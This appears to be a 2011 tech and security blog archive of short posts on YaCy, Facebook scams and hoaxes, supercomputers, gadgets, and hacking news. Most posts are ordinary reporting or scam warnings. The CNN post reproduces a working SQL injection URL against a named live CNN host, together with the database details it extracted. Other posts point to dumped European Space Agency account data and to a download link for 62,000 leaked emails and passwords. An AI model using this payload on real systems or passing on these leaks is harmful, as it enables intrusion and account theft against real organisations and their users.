Saturday, December 17, 2011

Tuesday, November 29, 2011

An Open Source Search Engine YaCy!


Web Search by the people, for the people

YaCy is a free search engine that anyone can use to build a search portal for their intranet or to help search the public internet.  
The software takes a radically new approach to search. YaCy does not use a 
central server. Instead, its search results come from a network of currently over
600 independent peers.In such a distributed network, no single entity decides 
what gets listed, or in which order results appear.
The YaCy search engine runs on each user's own computer. Search terms are encrypted before they
leave the user and the user's computer. Different from conventional search engines, 
YaCy is designed to protect users' privacy. A user's computer creates its individual search indexes and rankings, so that results better match what the user is looking for over time. YaCy also makes it easy to create a customized search portal with a few clicks.
Everyone can try out the search engine at http://search.yacy.net. Users can become part of YaCy's network by installing the software on their own computers. YaCy is Free Software, so anyone can use, study, share and improve it. It is currently available for GNU/Linux, Windows and MacOS. The project is also looking for developers and other contributors.
YaCy homepage: http://yacy.net
  
YaCy search portal: http://search.yacy.net/
  
How to contribute: http://yacy.net/en/Join.html
  

Monday, September 26, 2011

FACEBOOK PRICE GRID FOR MEMBERSHIP?

A hoax claiming that Facebook is planning to start charging users continues to spread across the social network.
FACEBOOK JUST RELEASED THEIR PRICE GRID FOR MEMBERSHIP. $9.99 PER MONTH FOR GOLD MEMBER SERVICES, $6.99 PER MONTH FOR SILVER MEMBER SERVICES, $3.99 PER MONTH FOR BRONZE MEMBER SERVICES, FREE IF YOU COPY AND PASTE THIS MESSAGE BEFORE MIDNIGHT TONIGHT. WHEN YOU SIGN ON TOMORROW MORNING YOU WILL BE PROMPTED FOR PAYMENT INFO...IT IS OFFICIAL IT WAS EVEN ON THE NEWS. FACEBOOK WILL START CHARGING DUE TO THE NEW PROFILE CHANGES. IF YOU COPY THIS ON YOUR WALL YOUR ICON WILL TURN BLUE AND FACEBOOK WILL BE FREE FOR YOU. PLEASE PASS THIS MESSAGE ON IF NOT YOUR ACCOUNT WILL BE DELETED IF YOU DO NOT PAY
Let me assure you, facebook is *not* going to ask you for your payment when you sign onto the site.  

Friday, September 23, 2011

Hack Your Way Into Facebook's New Timeline Feature


Step-by-Step Instructions:


1. Log in to facebook and open developer page.
2. Now, create a new app by clicking the button in the top left corner.
3. Enter app name and nemespace, agree to terms and condition and create app.
4. Click on the open graph link on the left.
5. Enter an action your app can do and an object for your app to interact with. 
6. Click the Get Started button. This will drop down the first of some pages of settings. Quickly click through them to create your app.
7. Congratulations  You're In!

Tuesday, July 5, 2011

Brother rapes his sister - Shocking Video Facebook Scam

Here is the latest facebook scam.



It's another survey scam.

Warn your friends, share the post.

Monday, June 27, 2011

Boy reaction after his Ex girlfriend posted on his wall Facebook Scam

Here is the latest facebook scam.


It's another survey scam, of course, which earns commission for the folks who created the web pages.
If you do make the mistake of clicking on the link you will be taken to a webpage shown below.




if you try to play the video as this is a clickjacking scam which attempts to  "Like" the page when you click.
Warn your friends, share the post.

Sunday, June 26, 2011

99% of people can't watch this video more than 25 seconds!!! Facebook Scam

Scams continue to be a problem on Facebook.

We have seen this photo on several scams as of late. If you click on the link, you are taken to  the following page: 


You are asked to share the scammer's message before you can see the video clip.



If you do share the post. you are taken to the following page:



If you close the window, then the same page as above will be displayed: 
 

How to Deal with the Scam:
You can remove the post by clicking the "x" in the top right hand corner of the post.

Friday, June 24, 2011

Photographer commited SUICIDE 3 dyas after shooting THIS video! Facebook Scam

Scams continue to be a problem on Facebook. 


So, what happens if you click on the link? 


Look familiar? Have you seen that "Jaa" button before? Well, you should have done as it's a very similar to the " Yeahh!! It happens on Live Television! Facebook scam."
You probably won't be surprised to hear that the purpose of the whole scam is to earn money - through tricking users into taking online surveys. And through your clicking on the links, you have helped promote the survey (via the sexy video lure) to your online friends.

Thursday, June 23, 2011

Yeahh!! It happens on Live Television! Facebook scam

It seems when faced with the prospect of seeing a adult video, common sense goes out of the window for some people and they click the link without thinking of the possible consequences.
Here is the message that is spreading between Facebook users
The links point to a webpage which presents you with what appears to be a sexy YouTube video.
You probably won't be surprised to hear that the purpose of the whole scam is to earn money - through tricking users into taking online surveys. And through your clicking on the links, you have helped promote the survey (via the sexy video lure) to your online friends.

Tuesday, June 21, 2011

Intel: Exascale Computing Arrives In 2018


Intel has big supercomputing plans and claims that exascale supercomputers, which are more than 120 times faster than today’s fastest supercomputer, will arrive within 7 years and 2 years earlier than previously predicted.


Japan surprised us this morning with a stunning 8.2 Petaflop per second (PFlop/s) supercomputer with more than half a million processing cores, but Intel believes that the K Computer will lose its position soon. Kirk Skaugen, vice president of Intel’s Data Center Group, today said that supercomputers will integrate more than 1 million cores by 2013 and break through the 100 PFlop/s barrier by 2015. 1 Exaflop per second (Eflop/s) should be possible by 2018 while we should be working with systems that are capable of 4 Eflop/s by 2020. 

Supercomputers Challenge Human Brain


Japan’s K Computer surprised the world with a giant leap in floating point number encoding performance today and is approaching the estimated calculation capability of the human brain.
Japan’s Riken Advanced Institute for Computational Science has taken the first spot on the prestigious list of the world’s 500 fastest supercomputers. The K Computer sets a new record in the number of processing cores, power consumption as well as peak and sustained computational performance. The current installation is not yet completed, but is already rated a peak performance of 8.77 PFlop/s, which equals 8.77 quadrillion floating point operations per second (Flop/s). The maximum sustained performance is 8.2 PFlop/s, more than three times the sustained performance of Tianhe-1.


K integrates 68,544 2.0 GHz Fujitsu Sparc VIIIfx CPUs with 8 cores each, which makes K the first supercomputer with more than half a million cores (548,352). Each core is rated at a peak performance of 16 (double-precision, DP) GFlop/s, which makes the Sparc VIIIfx CPU slightly more capable than Intel’s latest Sandy Bridge CPUs. A quad-core Sandy Bridge chip is estimated to deliver about 100 DP GFlop/s. The Fujitsu processor is not a mainstream processor, but was developed specifically for supercomputing in mind. The 45 nm chip features are dedicated floating point instructions that enable the processor to run 8 floating point operations per clock cycle per core.

Monday, June 20, 2011

OMG look at these bewbz Facebook scam

It seems when faced with the prospect of seeing a video of bewbz, common sense goes out of the window for some people and they click the link without thinking of the possible consequences.
Here is the message that is spreading between Facebook users

The links point to pages on Blogspot, where you will then be redirected to a webpage which presents you with what appears to be a sexy YouTube video.
You probably won't be surprised to hear that the purpose of the whole scam is to earn money - through tricking users into taking online surveys. And through your clicking on the links, you have helped promote the survey (via the sexy video lure) to your online friends.

Facebook Dislike button is a fake

Don't be too quick to click on links claiming to "Enable Dislike Button" on Facebook. 


The "Enable Dislike Button" link does not appear in the main part of the message, but lower down alongside "Link" and "Comment", is likely to fool some users into believing that it is genuine.
Clicking on the link will forward the fake message.

European Space Agency Hacked by TinKode


The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
  • Main informations about server.  Click here.
  • Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.

Emails:

Sunday, June 19, 2011

CNN vulnerable to SQL Injection

CNN.com is among the world's leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN's world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN's global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.

Website vulnerable: cgi.money.cnn.com 
Link:
http://cgi.money.cnn.com/tools/fortune/compare_2009.jsp?id=11439)/**/and/**/1=2/**/union/**/all/**/select/**/1,2,chr(94)||banner||ch r(94),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/(select/**/rownum/**/r,banner/**/from/**/(select/**/rownum/**/r,banner/**/from/**/v$version/**/where/** /rownum1-1/**/order/**/by/**/1)t/**/where/**/1=1/**/)--&view=b
Informations:

Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production



Main Database : MONEYP1.TURNER.COM


User : TIME_USR


Owner : SYS
Columns from “Time_Owner.F500_2009“:

[1] RANK
[2] COMPANY_ID
[3] NAME
[4] REVENUE
[5] REVENUE_GROWTH
[6] PROFIT
[7] PROFIT_GROWTH
[8] PROF_PCT_REVENUE
[9] PROF_PCT_ASSETS
[10] PROF_PCT_EQUITY
[11] EPS_10YR_GROWTH
[12] TRI_10YR
[13] TRI
[14] EMPLOYEES
[15] EMPLOYEE_GROWTH
Exposed by  : TinKode

Saturday, June 18, 2011

‘Smart cars’ that are actually, well, smart

Since 2000, there have been 110 million car accidents in the United States, more than 443,000 of which have been fatal  an average of 110 fatalities per day. These statistics make traffic accidents one of the leading causes of death in this country, as well as worldwide.

Engineers have developed myriad safety systems aimed at preventing collisions: automated cruise control, a radar- or laser-based sensor system that slows a car when approaching another vehicle; blind-spot warning systems, which use lights or beeps to alert the driver to the presence of a vehicle he or she can’t see; and traction control and stability assist, which automatically apply the brakes if they detect skidding or a loss of steering control.


The researchers test their algorithm using a miniature autonomous vehicle traveling along a track that partially overlaps with a second track for a human-controlled vehicle, observing incidences of collision and collision avoidance
The theory behind the algorithm and some experimental results will be published in the journal IEEE Robotics and Automation Magazine

Friday, June 17, 2011

An entire computer in Keyboard

Cybernet announced a zero footprint computer built into a keyboard.
The ZPC-D5 is the ultimate in space-saving PC technology, with the performance and reliability needed for today's business applications. You can turn any monitor into a computer instantly. Easy to install, deploy, and maintain, this keyboard PC can be up and running in a manner of minutes. Its small form factor gives IT managers the flexibility to deploy the unit wherever it may be needed across the enterprise.

Thursday, June 16, 2011

Transfer open applications between a computer and a cellphone

A new system lets you transfer open applications between a computer and a cellphone simply by pointing the phone’s camera at the computer’s screen.
Have you ever found yourself looking up directions on your computer just before running out the door, only to end up retyping the same addresses and mapping the same route on your phone minutes later? A new system designed by Tsung-Hsiang Chang, a graduate student in MIT’s Computer Science and Artificial Intelligence Laboratory, and Google’s Yang Li makes it much easier to transfer computing tasks between devices. Simply take a photo of your computer screen with your smartphone’s camera, and the phone automatically opens up the corresponding application in the corresponding state. The same process can also work in reverse, moving data from the phone to a desktop computer.
The system, called Deep Shot, exploits the fact that many Web applications use a standard format, called the uniform resource identifier (URI), to describe the states they’re in.
A demonstration showing how Deep Shot works

LulzSec Leaks 62,000 Email/Passwords of writerspace.com

The list of 62,000 emails/passwords just released by is probably the user database of writerspace.com.They tweet the download link as shown:
http://www.mediafire.com/?9em5xp7r0rd2yod

Hackers attack Malaysian government websites


Malaysia has been hit by a wave of attacks after the "Anonymous" hacker group accused the government of Internet censorship.
More than 50 government websites were hit and 41 of them were closed, AFP said.
The Malaysian Communications and Multimedia Commission (MCMC) said in a statement the attacks on websites with the .gov.my domain started shortly before midnight Wednesday and lasted several hours.
Little damage was caused and these were denial of service attacks. Apparently most of the websites have already recovered.
Anonymous warned on a website that it would target the government portal www.Malaysia.gov.my on Wednesday. It was still down this morning.
It is the second attack that Anonymous has made on a Government website over this same subject. Anonymous sabotaged Turkish sites last week to protest against Internet censorship.

PayPal vulnerability allows access to any account within 30 seconds

A security vulnerability in PayPal’s systems makes it possible to gain full, unrestricted access to any account within 30 seconds.

The vulnerability lies in PayPal’s forgotten password recovery features. Says Matt Langley:
PayPal sends Password Forgotten Change tokens to unauthorized email addresses instead of the email address on the account. Once you follow the link they email, and change the password, you are given total access to that account. No trickery or sophisticated hacking is required. It’s a bug in their email system that corrupts email addresses. 
Once the attacker has access, there’s nothing restricting their ability to siphon money out of the account.
The exploit is, of course, a direct violation of PayPal’s privacy policy and a laundry list of laws, so don’t try this at home  but PayPal needs to act as thieves aren’t particularly concerned with such things.

Wednesday, June 15, 2011

WOW, Big Baby Born, Amazing effects. Another Facebook likejacking scam

Messages are spreading rapidly across Facebook, as users get tricked into clicking on links claiming to show an amazing video of a big baby being born.
The messages are spreading with the assistance of a click-jacking scam (sometimes known as like-jacking) which means that users do not realize that they are invisibly pressing a "Like" button to pass the message onto their online friends.
A typical message looks as follows:

How to enable HTTPS in facebook?

Go to-->account--->account setting--->account security.

Monday, June 13, 2011

32 Anonymous suspects arrested in Turkey


Turkish police are reported to have detained 32 people in connection with internet attacks that have disrupted access to government websites.
Alleged members of the loosely-knit Anonymous hacktivist group were rounded up in 12 cities, including Ankara and Istanbul, just days aftersimilar arrests of Anonymous suspects in Spain.
At the end of last week, in an attack that was dubbed "Operation Turkey", Anonymous supporters brought down Turkish government websites in protest against controversial plans by the authorities in the country to introduce internet filtering.
The sites were brought down by a distributed denial-of-service (DDoS) attack, with different computers around the world being deployed to bombard the sites with traffic using the LOIC attack tool.

Sunday, June 12, 2011

Visit the New Facebook scare spreads on Facebook


Warnings are being posted across Facebook, warning users to beware messages from friends that invite them to "Visit the New Facebook".
Although these messages are being shared by Facebook users with the best of intentions, the warning about the risk of being locked out of your own Facebook account may in fact be more of a nuisance than the alleged hacker attack itself.
Here's a typical message seen on Facebook:
PLEASE RE-POST FOR EVERYONE!!!!!!!!!THIS NOTICE IS DIRECTED TO EVERYONE WHO HAS A PAGE ON FACEBOOK: IF SOME PEOPLE IN YOUR PROFILE OR YOUR FRIENDS SEND YOU A LINK WITH WORDS "VISIT THE NEW FACEBOOK ' DO NOT OPEN! IF YOU OPEN IT YOU CAN SAY GOODBYE TO YOUR PAGE. IT'S A HACKER WHO STEALS YOUR DETAILS AND REMOVES YOU FROM YOUR OWN PAGE. COPY AND SPREAD THE WORD

26,000 sex website passwords exposed by LulzSec


The notorious LulzSec hacking group has published login passwords for almost 26,000 users of an x-rated porn website.
The hackers compromised the database of the hardcore website (called "Pron"), exposing not only the email addresses and passwords of over 25,000 members but also the credentials of 55 administrators of other adult websites.

Saturday, January 22, 2011

Trojan For Android Could 'Listen' Credit Card Numbers

One of the features that makes iPhone users envious of their Android counterparts is voice-based commands. You could very well speak everything that you wanted to type and it would be detected and appear on your screen with relative accuracy. However, this voice-based feature could also be used for malpractices. A study from Indiana University has revealed existence of a new trojan horse programme called Soundminer that could detect when you “say” your credit card numbers during a conversation or even type it on your phone's keypad. 
The study says, "We implemented Soundminer on an Android phone and evaluated our technique using realistic phone conversation data." The study showed that an individual's credit card number can be reliably identified and stealthily disclosed. Therefore, the threat of such an attack is real, it said.

Thursday, January 6, 2011

The Go programming language

The Go programming language is an open source project to make programmers more productive. Go is expressive, concise, clean, and efficient. Its concurrency mechanisms make it easy to write programs that get the most out of multicore and networked machines, while its novel type system enables flexible and modular program construction. Go compiles quickly to machine code yet has the convenience of garbage collection and the power of run-time reflection. It's a fast, statically typed, compiled language that feels like a dynamically typed, interpreted language. 

Your Web Surfing History Is Accessible (Without Your Permission) Via JavaScript


The Web surfing history saved in your Web browser can be accessed without your permission. JavaScript code deployed by real websites and online advertising providers use browser vulnerabilities to determine which sites you have and have not visited, according to new research from computer scientists at the University of California, San Diego.